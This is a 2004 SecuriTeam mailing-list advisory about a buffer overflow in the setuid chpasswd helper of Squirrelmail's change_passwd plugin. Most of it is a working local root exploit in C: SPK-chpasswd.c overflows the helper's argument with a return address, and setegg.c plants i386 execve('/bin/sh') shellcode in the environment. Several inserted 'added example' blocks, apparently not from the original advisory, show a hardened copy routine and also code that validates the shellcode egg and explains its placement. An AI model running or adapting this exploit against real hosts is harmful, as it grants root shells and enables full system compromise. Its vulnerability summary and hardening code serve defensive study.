[UNIX] Squirrelmail Change_passwd Buffer Overflow Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04

    To: list@securiteam.com
    Date: 19 Apr 2004 12:14:39 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Squirrelmail Change_passwd Buffer Overflow Exploit
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article,
    <http://www.securiteam.com/unixfocus/5OP0F2ACKA.html> Squirrelmail
    Change_passwd Buffer Overflow, the chpasswd helper shipped with the
    change_passwd plugin copies a command-line argument into a fixed-size
    buffer without checking its length. Because the helper runs setuid root,
    a local user who passes an oversized argument can overwrite the saved
    return address on the stack and run code as root. The following exploit
    code can be used to test your system for the mentioned vulnerability:
    setegg places the shellcode in the environment, and SPK-chpasswd then
    execs chpasswd with the egg's address repeated throughout its first
    argument.
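    The bug class the advisory describes, as an added example that is not code
    from the advisory or from the change_passwd plugin: a hypothetical setuid
    helper that copies a user-supplied argument into a fixed stack buffer,
    beside the bounded form a reviewer would ask for. The buffer size, the
    function names and the allowed-character policy are assumptions chosen for
    illustration.

```c
/*
 * Added example, not the plugin's code: a model of the bug class
 * (unbounded copy of argv[] into a fixed-size stack buffer inside a setuid
 * helper) next to a bounded version. USER_MAX, the function names and the
 * character policy are assumptions of this example.
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define USER_MAX 32            /* assumed: room for a 31-char name + NUL */

/* Vulnerable pattern: strcpy() trusts the caller. With an argument longer
 * than USER_MAX bytes the copy runs past user[] into the saved frame
 * pointer and return address; the exploit on this page fills its first
 * argument with the address of its environment egg for exactly that
 * reason. Never call this with untrusted input. */
int copy_user_unchecked(const char *arg)
{
    char user[USER_MAX];
    strcpy(user, arg);          /* no length check */
    return (int)strlen(user);
}

/* Hardened form: measure against the bound before copying, reject rather
 * than truncate, and refuse anything that is not a plain account name so
 * the copied value can never smuggle a path or a shell metacharacter into
 * whatever the helper does next. Returns the length copied, or <0. */
int copy_user_checked(const char *arg, char *out, size_t outsz)
{
    size_t n = 0;
    while (n < outsz && arg[n] != '\0')    /* stop scanning at the bound */
        n++;
    if (n == 0 || n >= outsz)
        return -1;                         /* empty, or no room for the NUL */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return -2;                     /* not an account-name character */
    }
    memcpy(out, arg, n + 1);               /* n < outsz, so the NUL fits */
    return (int)n;
}

/* Argument-count check a helper invoked as <helper> a b c should do before
 * touching any argv[] element. Returns 0 when argv[1] was accepted. */
int helper_validate_argv(int argc, char **argv, char *user, size_t usersz)
{
    if (argc != 4)
        return -1;
    return copy_user_checked(argv[1], user, usersz) < 0 ? -2 : 0;
}

int main(int argc, char **argv)
{
    char user[USER_MAX];
    int rc = helper_validate_argv(argc, argv, user, sizeof user);
    if (rc == 0)
        printf("accepted user '%s'\n", user);
    else
        printf("rejected, code %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

    Run it as `./helper <user> <old> <new>`; a 200-byte first argument, which
    is what the exploit below supplies, is refused with code -2 instead of
    being copied over the return address.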

    DETAILS

    Exploit:
    SPK-chpasswd.c:
    /*
    ** Squirrelmail's chpasswd local root exploit bY SpikE <spike_vrm at
    ** mail.com>
    ** Bug found bY Matias Neiff <matias at neiff.com.ar>
    **
    ** Usage: Execute setegg before running this exploit
    **
    ** Target: i386 Linux. The overwritten return address is 4 bytes wide and
    ** the egg must sit at a fixed, executable stack address (no ASLR, no NX).
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>
    #include <unistd.h>      /* execl() */
    #include <sys/types.h>

    #define BUFSIZE 200

    char *Egg;
    uint32_t EggAddr;        /* address of the NOP sled inside spkEGG */
    char *chpasswd;

    void doExploit()
    {
     char Buffer[BUFSIZE];
     uint32_t *Ptr = (uint32_t *)Buffer;
     int i;

     fprintf(stdout,"[+] Egg address: %#010x\n",(unsigned)EggAddr);

     // Build evil buffer: every 4-byte slot holds the egg address, so
     // wherever the saved return address lies within the first 196 bytes
     // of the overflowed buffer it is replaced by a pointer into the sled
     for(i=0;i<BUFSIZE-4;i+=4)
      *Ptr++ = EggAddr;
     *Ptr = 0;   // NUL-terminate so the whole buffer is passed as one argument

     // eXploit it!! Buffer goes in as the first argument of chpasswd
     execl(chpasswd,"chpasswd",Buffer,"SPK","HACKED",(char *)NULL);

     // If reach here, error
     fprintf(stdout,"[-] %s not found!!!\n",chpasswd);
    }

    int main(int argc, char **argv)
    {
     printf("==[ Squirrelmail's chpasswd local root exploit bY SpikE <spike_vrm@mail.com> ]==\n\n");
     if(argc != 2)
     {
      printf("Usage: %s <chpasswd-full-path>\n\n",argv[0]);
      exit(0);
     }
     chpasswd = argv[1];
     // Get shellcode address: getenv() returns a pointer to the value part,
     // i.e. to the first NOP after "spkEGG="
     Egg = getenv("spkEGG");
     if(Egg == NULL)
     {
      printf("[-] spkEGG not found. Run \"setegg\" first.\n");
      exit(-1);
     }
     EggAddr = (uint32_t)(uintptr_t)Egg;
     doExploit();

     return(0);
    }

    setegg.c:
    /*
    ** EGG generator bY SpikE <spike_vrm@mail.com>
    **
    ** Usage: Execute this file before running the exploit
    **
    ** Puts "spkEGG=<NOP sled><execve("/bin/sh") shellcode>" into the
    ** environment and spawns a shell that inherits it; the exploit then
    ** reads the sled's address back with getenv().
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>      /* memset(), memcpy(), strlen() */

    #define EGGSIZE 300

    /* The leading "AAAAAAA" is a 7-byte placeholder that main() overwrites
    ** with "spkEGG=", so the variable name costs no extra bytes. Then 48 NOPs,
    ** then the classic i386 jmp/call execve("/bin/sh") payload. The string
    ** contains no NUL byte; it has to survive as a C string in the environment. */
    char Shellcode[] =
            "AAAAAAA\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
            "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
            "\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

    int main()
    {
     char EGG[EGGSIZE];   /* stays valid: main() does not return before system() */

     printf("[+] Creating EGG\n");

     memset(EGG,0,EGGSIZE);
     memcpy(EGG,Shellcode,strlen(Shellcode));
     memcpy(EGG,"spkEGG=",7);   /* overwrite the AAAAAAA placeholder */
     putenv(EGG);               /* environ now points into EGG[] */

     system("/bin/bash");       /* the child shell inherits spkEGG */
     return 0;
    }
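    Before trusting an environment egg like the one setegg.c builds, a
    practitioner checks three things: that the payload contains no NUL byte
    (execve() passes environment strings as C strings and would cut it
    short), that the jmp/call pair at the head of the payload actually lands
    on itself so `pop esi` picks up the "/bin/sh" pointer, and that
    getenv("spkEGG") returns the sled rather than the name. The following is
    an added example, not part of the advisory or of SpikE's code; it rebuilds
    the same egg (7-byte name pad, 48-byte sled, the payload bytes from
    setegg.c) and runs those checks. The check functions and their names are
    this example's own.

```c
/*
 * Added example, not the advisory's code: rebuild the "spkEGG" environment
 * string from setegg.c and verify it. Layout constants and payload bytes are
 * copied from setegg.c; the check functions are assumptions of this example.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define NAME_PAD 7     /* "AAAAAAA" in setegg.c, overwritten by "spkEGG=" */
#define SLED_LEN 48    /* three rows of sixteen 0x90 bytes */

/* Payload bytes exactly as in setegg.c: i386 Linux, int 0x80 ABI. */
static const unsigned char payload[] =
    "\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
#define PAYLOAD_LEN (sizeof(payload) - 1)     /* 43 bytes without the C NUL */

static char egg[NAME_PAD + SLED_LEN + PAYLOAD_LEN + 1];  /* outlives putenv() */

/* Build "spkEGG=" + sled + payload into egg[]; returns its strlen(). */
int egg_build(void)
{
    memcpy(egg, "spkEGG=", NAME_PAD);
    memset(egg + NAME_PAD, 0x90, SLED_LEN);
    memcpy(egg + NAME_PAD + SLED_LEN, payload, PAYLOAD_LEN);
    egg[NAME_PAD + SLED_LEN + PAYLOAD_LEN] = '\0';
    return (int)strlen(egg);
}

/* A single 0x00 inside the payload would silently truncate the egg. */
int payload_has_no_nul(void)
{
    return memchr(payload, 0, PAYLOAD_LEN) == NULL;
}

/* Target offset of the 2-byte short jmp (EB rel8) at payload[0], or -1. */
int payload_jmp_target(void)
{
    return payload[0] == 0xeb ? 2 + (int8_t)payload[1] : -1;
}

/* Target offset of the 5-byte call (E8 rel32, little-endian) at `at`, or -1. */
int payload_call_target(int at)
{
    if (at < 0 || (size_t)at + 5 > PAYLOAD_LEN || payload[at] != 0xe8)
        return -1;
    uint32_t rel = (uint32_t)payload[at + 1]
                 | (uint32_t)payload[at + 2] << 8
                 | (uint32_t)payload[at + 3] << 16
                 | (uint32_t)payload[at + 4] << 24;
    return at + 5 + (int32_t)rel;
}

/* Offset of "/bin/sh" in the payload, or -1. The jmp/call trick only works
 * when the call's return address (call offset + 5) equals this offset: that
 * is the value `pop esi` loads and execve() receives as the pathname. */
int payload_binsh_offset(void)
{
    for (size_t i = 0; i + 7 <= PAYLOAD_LEN; i++)
        if (memcmp(payload + i, "/bin/sh", 7) == 0)
            return (int)i;
    return -1;
}

/* Put the egg into the environment the way setegg.c does and confirm that
 * getenv("spkEGG") yields the sled with the name stripped and the payload
 * intact; that pointer is what SPK-chpasswd.c uses as the return address.
 * Returns 0 on success. */
int egg_check_env(void)
{
    if (egg_build() <= 0 || putenv(egg) != 0)
        return -1;
    const unsigned char *v = (const unsigned char *)getenv("spkEGG");
    if (v == NULL || strlen((const char *)v) != SLED_LEN + PAYLOAD_LEN)
        return -2;                         /* name not stripped or truncated */
    if (v[0] != 0x90 || memcmp(v + SLED_LEN, payload, PAYLOAD_LEN) != 0)
        return -3;                         /* sled or payload damaged */
    return 0;
}

int main(void)
{
    printf("egg length %d, jmp->%d, call@31->%d, /bin/sh@%d, env check %d\n",
           egg_build(), payload_jmp_target(), payload_call_target(31),
           payload_binsh_offset(), egg_check_env());
    return 0;
}
```

    Two caveats the checks cannot cover. The address the exploit prints is
    the egg's address in the exploit's own process; execve() lays the
    environment out afresh for chpasswd, so the length of the target's path
    and any variables placed after spkEGG shift it, and the 48-byte sled only
    absorbs small shifts (ASLR defeats it entirely). The payload also writes
    nine bytes past the end of "/bin/sh" (`mov [esi+8],esi`, `mov
    [esi+12],eax`, `mov [esi+7],al`) to build its argv, so it relies on the
    environment area being writable as well as executable.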

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spike_vrm@mail.com> SpikE VrM.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
